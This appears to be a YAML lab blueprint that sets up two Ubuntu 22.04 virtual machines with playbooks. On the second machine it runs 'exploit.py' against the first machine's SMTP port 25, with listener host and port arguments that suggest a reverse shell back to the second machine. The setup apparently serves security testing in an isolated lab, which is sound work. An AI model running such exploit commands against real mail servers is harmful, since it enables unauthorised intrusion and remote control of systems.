blueprint: ubuntu2204-ubuntu2204
ubuntu1:
  playbook: ubuntu1.yml
ubuntu2:
  playbook: ubuntu2.yml
  command: python3 /home/vagrant/exploit.py --rhost %ubuntu1% --rport 25 --lhost %ubuntu2% --lport 9000


